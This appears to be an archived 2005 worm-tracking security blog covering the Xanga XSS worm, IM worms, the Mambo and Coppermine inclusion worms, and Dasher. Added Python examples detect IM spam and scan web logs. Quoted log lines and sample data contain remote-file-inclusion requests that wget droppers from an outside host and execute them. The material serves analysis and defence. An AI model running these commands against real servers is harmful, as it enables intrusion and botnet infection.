Xanga Website XSS Worm, and IM Worm Using the WMF Attack
It looks like another social networking site, Xanga, has been hit by an XSS worm. Xanga is a blogging site popular with middle school kids; think of it as LiveJournal for the younger masses. From Xanga Hit By Script Worm on the always great SecuriTeam blog:
The worm consists of a simple HTML/script combination, and is highly primitive in nature. The worm propagates by using the XMLHTTP interface in some browsers to create worm-infected posts on the xanga weblogs of users who visit an infected site while signed in. This approach blurs the line between worm and old-style file infecting viruses. I’ll refer to it as a worm for clarity, since most of the literature on the recent MySpace attack uses the same term. Of particular note is that the worm is ‘dumb’ — it will repeatedly repost itself to previously-infected sites. The attack is extremely noisy, with each post carrying the malware’s obnoxious message.
Aside from the fact that such immature and badly-written messages as the one dropped by the worm would already stand out on most xanga blogs (that I care to read, anyway), the incessant reposting as the worm spread more than likely caused serious clogging. As a result, this worm’s life was extremely short. It is already over as you’re reading this analysis.
It appears upon further research that this worm was a variant of the similar Exodus worm that went quietly and unnoticed on December 19th. It was only in researching this outbreak that I saw the reports of Exodus. It appears that neither worm was written by a very skilled individual, as both strains are easily uprooted, browser-specific, badly-structured, trivially-decoded, and unnecessarily bloated. The worm is technically unimpressive (particularly vis-a-vis Exodus) and is a feat on par with the scores of VBSWG tweaks and edits following the infamous “Kournikova” worm outbreak of 2001.
In other news, I haven't commented on the WMF thing this week, but it looks like someone has gone and mashed up the IM worm space with the WMF exploit: the normal IM link-spamming technique, with the link now pointing at an infected file. This one is detected as an SDBot variant, appears to use the Kelvir IM-worm codebase, and affects the MSN network. You can find some analysis on the Kaspersky Lab Weblog: More on WMF exploitation. Both the F-Secure blog and the Kaspersky weblog have had great writeups, and so has the MoMusings blog, which has a concise, clear and accurate description of the situation.
December 31, 2005 in IM worms, new trends, new worms
Internet Worms: Walking on Unstable Ground
Another "it could get much worse" kind of thing, this one is a SANS practical.

Each day, worms are becoming a more common occurrence on the Internet. As the incidents increase, we must be thinking proactively in order to lessen the negative effects these worms have on the Internet community. It is important to remember that the livelihood of many businesses is based on an Internet presence.

Source: Internet Worms: Walking on Unstable Ground, by Jon Maurer.

The monetary losses incurred by businesses relating to these worms are hard to measure. Some estimate losses for each occurrence to be around $1 billion.[1] The true value of damages may never be known. Many companies prefer not to publicly report losses since they do not want to diminish customer confidence in their services.
So far, we have been lucky. There has not been a worm that caused widespread permanent damage to computers. Everything we have seen so far has been related to some sort of denial of service. In order to prepare for the future, we need to be thinking ahead to beat worm writers before they release the next worm onto the Internet. The worms we have seen so far have been fairly sloppy. Most propagate slowly, giving system administrators a chance to catch up on their security practices prior to any major damage taking place.
December 31, 2005 in papers
Bot Software Spreads, Causes New Worries
2005 has definitely been the year of the bot, bigger and badder than any other year. And since a bot's often delivered by a worm, it fits here, too. Been up to my neck in WMF-associated malware the past couple of days, but nothing I saw was a worm (it was all manually driven).

Zombies attack! Bot software sounds a bit like a low-budget horror movie, but it's quietly making trouble and stealing data right now, using millions of PCs worldwide. These malicious pieces of code, often compared to an undercover army of robots, invade a PC and use its computing power to do someone else's dirty work, most often without the PC owner's knowledge.

Source: Bot Software Spreads, Causes New Worries, by Laurianne McLaughlin, in IEEE Distributed Systems Online, ISSN 1541-4922, © 2004 IEEE Computer Society, Vol. 5, No. 6, June 2004.

The infected PC, known as a zombie, becomes another node on a bot network, typically 2,000 to 10,000 PCs strong, according to Symantec. Unfortunately, a bot network proves a practical tool for people who want to spread PC viruses and worms, send spam emails, install spyware on PCs, or carry out denial-of-service attacks on particular Web sites.
Technology publications have been buzzing about the bot threat ever since a flavor called Agobot took a fast ride through the Internet in April, finding its way into PCs thanks to a Windows operating system vulnerability. Security experts warn that large networks of Agobot-infected PCs now sit at the ready, waiting for directions. Have the risks been overblown, or do bots deserve special scrutiny?
December 30, 2005 in new trends, papers
New PHPBB Malware?
I've been seeing Apache log entries that suggest there is some new phpBB malware on the loose, meaning it's not just manual attacks but automated ones. A couple of days after this started (the first dates I see are around December 11, then picking up again on about December 21 or 22) a new phpBB exploit appeared. I'm not entirely sure whether that exploit is related to any malware that may be using it, but these appear to be the traces it leaves in an Apache log:
```
xxx.xxx.62.7 - - [27/Dec/2005:05:57:09 -0500] "GET
/modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=
http://209.136.48.69/cmd.gif?&cmd=
cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|
HTTP/1.1" 404 258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
```
The filenames vary, but so far I've seen "micu", "cback", "listen", "criman", and "cbac". The "cmd.gif" file (also seen as "tool25.dat") is a PHP script, with some JavaScript in it as well, that runs whatever is passed in the cmd parameter; this lets the compromised machine act as a command proxy for the attacker.
A source tells me it may be a new variant of the Santy worm, but this one may use MSN Search to find its victims. Previous versions of the Santy worm used Google to search for potential victims.
Consider this a request for information. If anyone has a copy of "micu" or "cbac", please share if you could ...
December 27, 2005 in new worms
IM worms: A 2005 review
2005 has been a busy year for IM-based worms, as the table below shows. So far the state of the attack is link spamming, mostly over AIM, and this trend doesn't look like it will stop. Consider this the same developmental stage as the late 1990s for e-mail based worms: no client-side vulnerability attacks with specific exploits, just spamming and hoping someone is dumb enough to click.
| Date First Seen | Latest Date Seen | Threat Family Name | IM Networks Affected | Brief description |
|---|---|---|---|---|
| January, 2005 | January, 2005 | MyDoom.AL (a variant of the mass mailer family) | ICQ | Link spamming, joins a botnet |
| January, 2005 | February, 2005 | Bropia | MSN Messenger | Link spamming |
| February, 2005 | February, 2005 | Aimdes | AIM | Link spamming |
| March, 2005 | December, 2005 | Kelvir | MSN Messenger | Link spamming, downloads a Spybot variant |
| April, 2005 | May, 2005 | Picrate | AIM | Link spamming, downloads a Spybot variant, and joins a botnet |
| April, 2005 | July, 2005 | Opanki | AIM | Link spamming, downloads a Spybot variant, and joins a botnet |
| April, 2005 | August, 2005 | Chod | MSN Messenger | Link spamming, installs spyware, joins a botnet |
| April, 2005 | April, 2005 | Velkbot | AIM, Yahoo!, MSN Messenger | Link spamming, installs spyware, joins a botnet |
| April, 2005 | April, 2005 | Gabloliz | AIM | Link spamming, joins a botnet |
| May, 2005 | May, 2005 | Pinkton | AIM | Link spamming |
| May, 2005 | May, 2005 | Doyorg | AIM | Link spamming, joins a botnet |
| August, 2005 | August, 2005 | Guapim | AIM, MSN | Link spamming, downloads a Spybot variant |
| October, 2005 | October, 2005 | Loxbot | AIM | Link spamming, joins a botnet |
| November, 2005 | November, 2005 | Yimper | AIM, Yahoo! | Link spamming |
| December, 2005 | December, 2005 | Santa | AIM, ICQ, MSN, Windows Messenger, Yahoo! | Link spamming related to holiday activity. Malicious software and a rootkit is downloaded and installed. |
| December, 2005 | December, 2005 | Dinoxi | AIM | Link spamming, joins a botnet |
| December, 2005 | December, 2005 | Myspace | AIM | Link spamming, some user interactivity |
So, what can you do to stop this? Again, taking the network-centric approach: run your own message router or a proxy, watch each client's out-degree (how many distinct people it tries to contact in a short period of time), look for self-similar messages (the same link or text going to many contacts), and throttle the message rate. eWeek covered some of this and more in IM Threats: The Dark Side of Innovation, an article on defense measures against IM-based attacks.
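To make that network-centric approach concrete, here is an added example (my code, not from this post or from the eWeek article) of the per-sender accounting an IM proxy or message router could keep: a sliding window per sender that tracks out-degree (distinct recipients), message rate, and self-similarity (the share of the window made up of one message template), and hands back an allow/throttle/block verdict per message. The thresholds, the template normalization and the sample traffic are constructed assumptions for illustration.

```python
import re
from collections import Counter, defaultdict, deque

# Thresholds are illustrative assumptions, not figures from the post or from eWeek.
WINDOW_SECONDS = 60      # sliding window kept per sender
MAX_OUT_DEGREE = 8       # distinct recipients per window before we react
MAX_RATE = 20            # messages per window before we react
SIMILARITY_FLOOR = 0.8   # share of the window made up of one message template

URL_RE = re.compile(r'(?:https?://|www\.)\S+', re.IGNORECASE)
DIGITS_RE = re.compile(r'\d+')


def normalize(body):
    """Collapse a message to a template so that near-identical link spam compares
    equal: URLs -> <url>, digit runs -> <n>, case and whitespace folded."""
    t = URL_RE.sub('<url>', body.lower())
    t = DIGITS_RE.sub('<n>', t)
    return ' '.join(t.split())


class ImThrottle:
    """Per-sender sliding window, as an IM proxy or message router would keep it."""

    def __init__(self, window=WINDOW_SECONDS, max_out_degree=MAX_OUT_DEGREE,
                 max_rate=MAX_RATE, similarity_floor=SIMILARITY_FLOOR):
        self.window = window
        self.max_out_degree = max_out_degree
        self.max_rate = max_rate
        self.similarity_floor = similarity_floor
        self.history = defaultdict(deque)   # sender -> deque[(ts, recipient, template)]

    def observe(self, ts, sender, recipient, body):
        """Record one outbound message and return (verdict, stats) for it.
        verdict is 'allow', 'throttle' (delay or queue it) or 'block'."""
        q = self.history[sender]
        q.append((ts, recipient, normalize(body)))
        while ts - q[0][0] > self.window:          # expire messages outside the window
            q.popleft()
        rate = len(q)
        out_degree = len({r for _, r, _ in q})
        _, top = Counter(t for _, _, t in q).most_common(1)[0]
        similarity = top / rate
        if out_degree > self.max_out_degree and similarity >= self.similarity_floor:
            verdict = 'block'      # one template fanned out to many contacts: link spam / worm
        elif rate > self.max_rate or out_degree > self.max_out_degree:
            verdict = 'throttle'   # merely bursty: slow it down but keep delivering
        else:
            verdict = 'allow'
        return verdict, {'rate': rate, 'out_degree': out_degree, 'similarity': similarity}


def sample_stream():
    """Constructed traffic, not captured data: an ordinary user, an infected client
    spraying one link at its buddy list, and a user pasting a log line by line."""
    msgs = []
    chatter = ["hey, lunch?", "sure, noon works", "did you see the game",
               "ok see you", "running late", "later"]
    for i, text in enumerate(chatter):
        msgs.append((10 + 9 * i, "alice", ["bob", "carol", "dave"][i % 3], text))
    for i in range(12):
        msgs.append((100 + 2 * i, "mallory", f"buddy{i:02d}",
                     f"lol check this out http://example.invalid/pics.php?id={1000 + i}"))
    for i in range(25):
        msgs.append((200 + i, "trent", "peer", f"line {i} of the build log"))
    return sorted(msgs)


def run(stream, throttle=None):
    """Feed a (ts, sender, recipient, body) stream through the throttle and
    return [(ts, sender, verdict, stats), ...] in stream order."""
    throttle = throttle or ImThrottle()
    return [(ts, s, *throttle.observe(ts, s, r, b)) for ts, s, r, b in stream]


if __name__ == '__main__':
    for ts, sender, verdict, stats in run(sample_stream()):
        if verdict != 'allow':
            print(f"t={ts:3d} {sender:8s} {verdict:8s} {stats}")
```

The split between the two verdicts is the point: a high message rate alone (trent pasting a log to one contact) only gets throttled, while fan-out of one template to many contacts (mallory, the infected client) gets blocked, which is the shape a link-spamming IM worm produces and a human conversation does not.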
December 24, 2005 in IM worms, new trends
Two Minor Worms of Note: Kaiten, Santa
It's Thursday, and that must mean some more worms on the loose. Two relatively minor worms of note if only just to evaluate the state of the attack these days.
First up is a newer variant of the Linux Mambo worm in the wild. Mambo has a remote file inclusion flaw (the mosConfig_absolute_path setting can be supplied in the request) that yields arbitrary command execution, which the worm uses to fetch its kickoff script. If you've been attacked, you will see log lines like this:
```
index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?
&cmd=cd%%20/tmp;wget%%20209.136.48.69/micu;chmod%%20744%%20micu;./micu;
```
It looks like the download site (209.136.48.69) has been disabled, but it was up earlier this morning (which helped to delay me posting this information). The worm installs two components. The first, mare, is the Mambo attack vector. The second is a variant of the Kaiten bot. This variant connects to the IRC servers us.undernet.org and eu.undernet.org and can launch the standard suite of DDoS attacks. The call graph of this component, named "ro" in this instance, is graphed here. So, what's the state of the hack? Pretty lousy, to be honest, even worse than the Linux Slapper worm from 2002 or so. Instead of building one big binary, the worm fetches a Bash script which in turn fetches two more binaries and launches them. It would have been easier to fetch the malware from the attacking node (and not a central site) and bundle it all in one executable.
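Both this Mambo probe and the Coppermine one quoted in the "New PHPBB Malware?" entry above leave the same two marks in a web log: a query parameter whose value is a remote URL (the file inclusion) and a cmd parameter carrying a shell pipeline that fetches and runs a dropper. As an added example, not code from this blog or from the worm, here is a small Python scanner that pulls those probes out of an Apache access log and reports the included host and the dropped filenames. The sample lines are constructed from the two excerpts quoted on the page (client addresses are RFC 5737 documentation addresses); the doubled percent signs in the Mambo excerpt are assumed to be a quirk of the worm's request builder and are collapsed before decoding.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not captured data), modeled on the two excerpts quoted
# on this page: the Coppermine THEME_DIR probe from the "New PHPBB Malware?" entry
# and the Mambo mosConfig_absolute_path probe above. Client addresses are RFC 5737
# documentation addresses; the download host is the one quoted in both excerpts.
SAMPLE_LOG = r'''
198.51.100.7 - - [27/Dec/2005:05:57:09 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 404 258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.9 - - [22/Dec/2005:09:12:41 -0500] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%%20/tmp;wget%%20209.136.48.69/micu;chmod%%20744%%20micu;./micu; HTTP/1.1" 200 1417 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
203.0.113.4 - - [27/Dec/2005:06:01:00 -0500] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

# Apache common/combined log prefix: client ident user [timestamp] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself a remote URL is the file-inclusion signature.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://([^/?#:]+)', re.IGNORECASE)
# Downloader invocations inside the injected command string.
FETCH_CMD = re.compile(r'\b(?:wget|curl|lynx)\s+(?:-\S+\s+)*(\S+)')


def decode_param(raw):
    """Percent-decode one query component. The Mambo excerpt shows doubled percent
    signs (%%20), assumed here to be a printf-style quirk of the worm's request
    builder, so runs of '%' before a hex pair are collapsed first."""
    return unquote(re.sub(r'%+(?=[0-9A-Fa-f]{2})', '%', raw))


def split_query(target):
    """Return (path, [(name, value), ...]) for a request target. Done by hand
    rather than with parse_qsl, whose ';' handling varies between Python
    versions and would shred the ';'-separated shell pipeline in cmd=."""
    path, _, query = target.partition('?')
    params = []
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            params.append((decode_param(name), decode_param(value)))
    return path, params


def analyze_request(target):
    """Return a finding for a request carrying a remote-URL parameter (RFI)
    and/or a cmd= shell pipeline; None for anything else."""
    path, params = split_query(target)
    finding = {'path': path, 'rfi_param': None, 'include_host': None,
               'commands': [], 'fetched': []}
    for name, value in params:
        m = REMOTE_URL.match(value)
        if m and finding['rfi_param'] is None:
            finding['rfi_param'] = name
            finding['include_host'] = m.group(1)
        if name == 'cmd':
            finding['commands'] = [c.strip() for c in value.split(';') if c.strip()]
            for cmd in finding['commands']:
                f = FETCH_CMD.match(cmd)
                if f:
                    url = f.group(1)
                    finding['fetched'].append((url, url.rsplit('/', 1)[-1]))
    if finding['rfi_param'] is None and not finding['commands']:
        return None
    return finding


def scan_log(text):
    """Run analyze_request over every parseable line and return the findings
    with client, timestamp and response status attached."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = analyze_request(m.group('target'))
        if hit:
            hit.update(client=m.group('client'), ts=m.group('ts'),
                       status=int(m.group('status')))
            findings.append(hit)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} {f['path']} status={f['status']} "
              f"rfi={f['rfi_param']} host={f['include_host']} "
              f"drops={[name for _, name in f['fetched']]}")
```

The response status is worth keeping in the report: a 404 on the probe (as in the Coppermine line) means the vulnerable script was not there, while a 200 on an install that does have it is the request to chase, and the fetched filenames ("cbac", "micu" and the rest) are what to look for in /tmp on that host.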
The second thing making the rounds today is a new IM worm. I've spent part of the day building a chart of IM worm activity for 2005 which I plan to post tomorrow. But, right now, the Santa worm is the new kid on the block. Unlike past IM worms, which have stuck to one or two networks, this one affects users of the following major IM networks: AIM, MSN Messenger, Yahoo!, and ICQ. I didn't find another IM worm that used all four major networks in the past year, so this is probably the most interesting thing about this worm. Other than that, it spams potential victims with links, installs a rootkit, and can steal information from an infected machine.
Nothing too major, but some stuff worth noting. Seems like everyone wants their own worm this year.
December 22, 2005 in IM worms, new worms
15th EICAR Annual Conference Call for Papers
The 2006 EICAR conference, which will be held 29 April through 2 May 2006 in Hamburg, Germany, has a few days left in its call for papers. From the CFP, relevant (to Wormblog readers) topics include:
- Side effects of malicious code
- Viruses and worms
- Vulnerabilities
- e-Crime and e-Forensics
- Legal, Privacy and Social Issues of ICT Security
- Intrusion Detection and Prevention
Academic, peer reviewed papers - these papers will be peer reviewed by members of the program committee and other independent reviewers (where necessary) and published in the edited conference proceedings with ISBN and on conference CD-ROM. Case studies, research in progress and full research papers will be considered for the inclusion in the conference program and published proceedings. There is no definitive word limit for the submissions; however, it is anticipated that submissions will be between 3500 and 5500 words. The program committee will not accept research proposals for submission to the conference.

Important dates:
- Academic paper submissions due: 13 January 2006
- Poster submissions due: 24 February 2006
- Notification to authors for academic papers: 11 February 2006
- Notification to authors for poster submissions: 3 March 2006
December 21, 2005 in events
VB2006 call for papers
The call for papers for VB2006 is now open. It runs through the 9th of March, 2006. From the CFP:
The following is a list of suggested topics elicited from attendees at VB2005. Please note that this list is not exhaustive, and papers on these and any other anti-malware and spam-related subjects will be considered.
Technical AV:
- Malware collection tools/honeypots
- Malware classification tools
- Spyware/adware - definition, techniques and detection
- Malware with respect to cryptography
- Threats and protection for mobile devices
- Emulation, engine level sandboxing, unpacking techniques
- Rootkits
- x64 malware
- Malware on non-Windows platforms
- Emulators/heuristics/PE unpacking on non-Windows platforms
- Hardware anti-malware solutions
- Tools of the trade (deobfuscation, IR, etc.)
- Behavioural analysis and detection
- Proof of concept demonstrations
- Phishing
- Latest malware outbreaks
- PDF threats
- Wireless security
- CERT/vendor cooperation
- Hardware supported virtualisation

Corporate AV:
- Case studies
- Best practices
- Policy enforcement
- Vulnerability assessment
- Risk management
- Phishing & fraud in the corporate environment
- Spyware/adware in the corporate environment
- Online crime prevention
- Tracing malware authors/perpetrators
- Anti-virus & anti-spyware performance testing
- Educating users
- Management of anti-virus infrastructures
- Proactive detection mechanisms
- IDS/IPS
- False positive prevention
- Government security policies
- IT outsourcing and associated risks
- Mobile threats
- Anti-malware managed services
How to submit a paper
Abstracts of approximately 200 words must be sent as plain text files to editor@virusbtn.com no later than Thursday 9 March 2006. Submissions received after this date will not be considered. Please include full contact details with each submission.
VB2006 will take place October 11-13 2006 at the Fairmont The Queen Elizabeth, Montréal, Québec, Canada.
December 20, 2005 in events
DIMVA 2006 - Call for Papers
The 2006 DIMVA workshop is going to be held in Berlin, Germany from July 13 - 14, 2006. According to the call for papers:
The special interest group Security - Intrusion Detection and Response (SIDAR) of the German Informatics Society (GI) organizes DIMVA as an annual conference that brings together experts from throughout and outside of Europe to discuss the state of the art in the areas of intrusion detection, malware detection, and vulnerability assessment. DIMVA invites three types of submissions:
- Full papers of up to 20 pages, presenting novel and mature research results. Full papers will be reviewed, and papers accepted for presentation at the conference will be included in the proceedings. The proceedings are planned to appear in Springer's Lecture Notes in Computer Science (LNCS) series.
- Industry papers of up to 10 pages, describing best practices, case studies, lessons learned, or latest product developments. Industry papers will be reviewed and, if accepted for presentation at the conference, published on the DIMVA 2006 Web site.
- Proposals of two-to-three-hour tutorials on topics of current or emerging interest. Tutorial proposals must not exceed 3 pages. They must clearly identify the intended audience, include a brief biography of the speaker, and contain sufficient material to provide a sense of their scope and depth. Tutorial material will be published on the DIMVA 2006 Web site.
The scope of DIMVA is broad and includes, but is not restricted to the following areas:
Vulnerability Assessment:
- Vulnerabilities and exploitation techniques
- Vulnerability detection
- Avoidance of vulnerabilities and software testing
- Reverse engineering
- ROI on vulnerability assessment and management
Intrusion Detection:
- Intrusion techniques
- Intrusion detection and event correlation
- Intrusion response and intrusion prevention
- Benchmarking of intrusion detection and prevention systems
- Incident management and response
Malware:
- Malware techniques
- Malware detection
- Malware prevention
- Benchmarking of malware detection and prevention systems
- Computer and network forensics
DIMVA particularly encourages papers that discuss the technical as well as the organizational integration of vulnerability, intrusion and malware detection techniques and systems for large-scale communication and enterprise networks.
Important dates:
- January 13, 2006: Deadline for submission of full and industry papers.
- March 3, 2006: Deadline for submission of tutorial proposals.
- March 22, 2006: Notification of acceptance or rejection.
December 19, 2005 in events
Dasher Analysis and Thoughts
Some thoughts on the new Dasher worm that's spreading.
First, I've had a chance to look at all three variants of the worm and reverse engineer the actual code. A big thank you to some research partners for the binaries. Having looked at the operations the worm performs, it's obvious that it's been put together in a very haphazard fashion. The main driver of the worm actually writes a batch file that gets executed; the exploit code and the scanner are not married as code. As such, they have to be coordinated by a process (Sqltob.exe) that launches the scanner process and manages the exploit process (or processes). No one even stripped out Swan's happy little printf() statements in the exploit code! This is a very amateur effort on the basis of the reverse engineering.
Secondly, the worm is using a central distribution point to send out the worm binaries. The tradeoffs here are mostly obvious. As a benefit, the worm master can update the binaries here and inject new exploits or new capabilities, or just bugfixes, quite handily. It may not affect the existing worm infected systems (unless they actually poll or are connected to a worm master controlled site), but that can be sufficient. If you think about it as a seeded base from which to launch a new, improved worm, that's quite an obvious benefit. The risk inherent in this is also obvious, namely that it's easy to either shut down or begin blocking access to this central distribution site. You can block a domain name or even a 2LD, an IP address, or a port and achieve most of the blocking you need to. Pretty easy to shut this one down, as happened with Dasher.A. Dasher.B and C recycle the same master fetch site. Why someone hasn't yet repackaged the worm to send the payload from the attacker to the victim is beyond me, assuming they were capable of it.
Thirdly, the worm is clearly being worked on. It's been shown that you can get an effective worm installed (some stats I've seen suggest a couple thousand hosts worldwide are infected by this worm) using the MSDTC exploit, but it's already been augmented with three older vulnerabilities: UPNP/LSASS, MS SQL, and the WINS exploit. So, this is going to see some more work before it goes away, and we'll probably see the MSDTC exploit code rolled into the various flavors of RBot, SDBot, and such in the next few days (if you're not seeing it already).
Keep in mind it's not usually the best and brightest of the attackers who write worms, which means it's usually pretty easy to analyze these things and shut them down. While there's been great effort put forth to make stealthy, polymorphic, and difficult-to-analyze malware, it rarely gets used in the wild on a global scale. For the foreseeable future, we're going to see worms like Dasher get launched, and we're going to have to shut them down the same way we always do.
If you haven't patched your MSDTC holes yet, go do so. If you can't, make sure you block TCP port 1025 to those systems.
December 18, 2005 in dasher, editorial